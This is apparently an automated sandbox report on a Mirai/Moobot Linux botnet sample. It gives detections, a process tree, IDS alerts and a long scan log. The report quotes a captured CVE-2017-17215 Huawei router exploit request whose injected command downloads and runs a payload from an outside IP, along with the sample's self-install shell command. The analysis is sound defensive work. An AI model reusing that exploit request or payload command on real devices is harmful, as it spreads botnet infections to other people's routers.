Linux Analysis Report
v8OWS3Ylfj.elf

Overview

General Information

Sample Name:v8OWS3Ylfj.elf
Original Sample Name:2b318e2fa59dccaa45cc59c5fea7e082.elf
Analysis ID:830702
MD5:2b318e2fa59dccaa45cc59c5fea7e082
SHA1:d5bf527325fbfbda5d26272bb88874bc504dd260
SHA256:7bbce804ece6b26f0fcf2937fd5217518848f044c95cc6d033f5a08f04598a06
Tags:32, elf, intel, mirai
Infos:

Detection

Mirai, Moobot
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Moobot
Snort IDS alert for network traffic
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Yara signature match
Sample has stripped symbol table
HTTP GET or POST without a user agent
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Analysis Advice

All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which no longer works.
Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830702
Start date and time:2023-03-20 16:12:59 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 1s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:v8OWS3Ylfj.elf
Original Sample Name:2b318e2fa59dccaa45cc59c5fea7e082.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@1/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
Command:/tmp/v8OWS3Ylfj.elf
PID:6223
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:sh: 1: Syntax error: Unterminated quoted string
  • system is lnxubuntu20
  • v8OWS3Ylfj.elf (PID: 6223, Parent: 6125, MD5: 2b318e2fa59dccaa45cc59c5fea7e082) Arguments: /tmp/v8OWS3Ylfj.elf
    • sh (PID: 6224, Parent: 6223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv \"/tmp/v8OWS3Ylfj.elf \\xdc\u0420\\xff\\x84\\x88&bin/watchdog; chmod 777 bin/watchdog"
  • cleanup
Name:Mirai
Description:Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution:No Attribution
Link:https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name:MooBot
Attribution:No Attribution
Link:https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Source | Rule | Description | Author | Strings
v8OWS3Ylfj.elf | JoeSecurity_Moobot | Yara detected Moobot | Joe Security |
v8OWS3Ylfj.elf | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
v8OWS3Ylfj.elf | Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown |
v8OWS3Ylfj.elf | Linux_Trojan_Gafgyt_5bf62ce4 | unknown | unknown |
  • 0x97b1:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
v8OWS3Ylfj.elf | Linux_Trojan_Mirai_b14f4c5d | unknown | unknown |
  • 0x3d80:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3

Source | Rule | Description | Author | Strings
6223.1.0000000008048000.0000000008056000.r-x.sdmp | JoeSecurity_Moobot | Yara detected Moobot | Joe Security |
6223.1.0000000008048000.0000000008056000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
6223.1.0000000008048000.0000000008056000.r-x.sdmp | Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown |
6223.1.0000000008048000.0000000008056000.r-x.sdmp | Linux_Trojan_Gafgyt_5bf62ce4 | unknown | unknown |
  • 0x97b1:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6223.1.0000000008048000.0000000008056000.r-x.sdmp | Linux_Trojan_Mirai_b14f4c5d | unknown | unknown |
  • 0x3d80:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3

Timestamp:03/20/23-16:13:48.596290
Source IP:192.168.2.23
Destination IP:195.133.40.202
SID:2030490
Source Port:36176
Destination Port:56999
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:03/20/23-16:13:53.166618
Source IP:195.133.40.202
Destination IP:192.168.2.23
SID:2030489
Source Port:56999
Destination Port:36176
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:03/20/23-16:13:57.691757
Source IP:192.168.2.23
Destination IP:195.164.211.50
SID:2835222
Source Port:57976
Destination Port:37215
Protocol:TCP
Classtype:A Network Trojan was detected

AV Detection

Source: v8OWS3Ylfj.elf, Virustotal: Detection: 56%
Source: v8OWS3Ylfj.elf, ReversingLabs: Detection: 58%
Source: v8OWS3Ylfj.elf, Joe Sandbox ML: detected

Networking

Source: Traffic, Snort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:36176 -> 195.133.40.202:56999
Source: Traffic, Snort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 195.133.40.202:56999 -> 192.168.2.23:36176
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57976 -> 195.164.211.50:37215
Source: unknown, Network traffic detected: HTTP traffic on port 57976 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 46180 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 42668 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 42668
Source: unknown, Network traffic detected: HTTP traffic on port 34274 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 54054 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 43448 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 32862 -> 37215
Source: DNS query: test.zxyes.xyz
Source: global traffic, HTTP traffic detected:
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
Content-Length: 456
Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.238.147.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 14.172.125.254:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.213.204.200:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.8.129.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.110.229.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.104.79.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.200.135.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.101.111.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.109.105.139:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.191.201.37:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.29.114.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.51.7.195:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.250.51.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.13.55.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.245.200.44:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 101.25.173.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 211.6.17.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.40.138.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.161.172.250:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.75.210.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.255.0.133:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 180.123.30.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.183.247.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.142.254.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.139.140.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 204.25.75.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.102.230.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 66.62.243.142:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.4.118.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.123.18.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 45.89.156.207:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.99.246.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.116.209.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.192.230.251:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.18.157.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.248.98.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.182.228.222:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.153.118.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.121.240.114:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.114.203.50:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.122.33.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.210.152.78:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 104.139.237.74:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.11.230.191:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.162.49.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.220.5.218:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.0.80.250:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.212.25.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.199.92.164:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.63.0.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.95.100.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.19.174.214:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.197.63.133:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.51.196.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.184.99.129:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 218.159.167.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.252.46.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 136.111.170.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.245.100.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.220.103.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.87.221.44:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 68.245.128.74:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.56.217.182:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 177.167.108.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.64.183.14:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.130.225.208:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.2.35.208:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.203.154.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.183.97.223:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.146.66.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.235.179.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.160.247.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.224.24.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.53.112.72:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.43.100.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.178.218.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.134.31.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.147.190.50:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.57.187.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.251.20.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.245.120.178:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.225.3.239:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 42.55.126.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.106.157.159:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.166.186.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.85.97.38:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.0.57.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.186.67.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.182.18.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 77.206.253.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.221.49.241:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 147.60.90.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.145.156.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.10.245.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.199.234.72:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.212.114.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 12.89.204.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.197.131.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.103.40.142:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.92.197.181:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.103.40.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.206.210.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.94.245.56:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.123.68.213:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.21.126.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.28.6.21:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.237.236.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 183.54.17.213:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.249.170.107:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.225.212.201:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.137.219.147:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.242.55.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 203.16.255.30:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.100.126.87:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.134.0.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.1.71.200:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.177.222.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.201.235.139:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.56.22.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 17.45.7.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 148.71.250.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.150.135.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.154.30.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.90.228.142:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.58.14.139:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.40.189.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.205.114.170:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.155.181.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.162.147.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 86.230.48.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:36176 -> 195.133.40.202:56999
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.117.240.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 40.39.58.9:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.233.243.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.202.164.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.36.14.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.25.166.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.201.81.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 113.75.65.62:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.168.41.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.143.52.182:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.127.160.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.123.157.159:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.63.8.130:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.213.8.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.189.24.208:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 174.219.106.181:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 190.37.51.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.198.131.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.119.233.53:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 77.169.61.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.34.121.101:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.7.44.223:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.156.83.140:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.51.150.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 90.89.224.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.173.44.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.34.213.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.73.227.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.196.4.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.207.91.201:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.93.58.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.164.141.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.74.242.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 171.208.85.140:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.240.119.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.118.18.117:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.192.130.178:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.154.168.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.175.53.115:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.104.150.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.141.51.134:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.143.222.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.16.33.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.241.97.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.175.161.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 52.146.73.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.190.112.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 78.152.206.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.153.48.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.236.129.80:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.99.48.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.162.254.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 131.48.160.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.198.220.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 202.196.87.47:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.254.203.64:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 46.46.163.21:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.74.169.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.211.202.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.228.75.229:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.25.25.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 83.37.238.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.200.188.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.49.178.13:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.248.87.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.235.23.87:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.102.98.103:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.37.45.134:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 101.206.159.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.14.77.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.177.70.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.96.106.142:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.238.1.143:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 144.108.196.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.151.1.252:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 132.60.255.151:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.45.148.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.235.214.2:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 8.235.38.114:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.52.167.214:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 187.207.189.169:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.6.171.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 102.154.15.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.36.128.72:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.243.191.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.200.39.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.180.16.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.37.118.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.242.47.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.96.46.114:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.236.133.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.72.204.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.88.51.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.173.5.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.231.20.149:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 137.109.232.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.242.173.246:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.184.157.113:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 31.113.92.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 71.67.32.131:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.179.36.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.110.19.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.109.207.95:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 114.192.151.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.1.21.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.99.72.14:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.216.242.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.169.141.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.207.195.181:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.240.97.103:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.55.101.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.221.98.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.30.129.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 152.99.139.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.147.32.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.206.7.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.22.51.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 89.238.72.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.220.163.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.72.172.78:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.54.129.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.41.52.86:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.10.25.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.155.46.149:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.71.234.119:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.56.120.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.220.43.239:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.248.34.129:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.73.9.64:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 46.117.92.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.136.192.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.107.92.47:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 65.247.121.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.125.235.29:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.238.237.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.250.208.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 131.89.128.119:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.107.243.105:37215
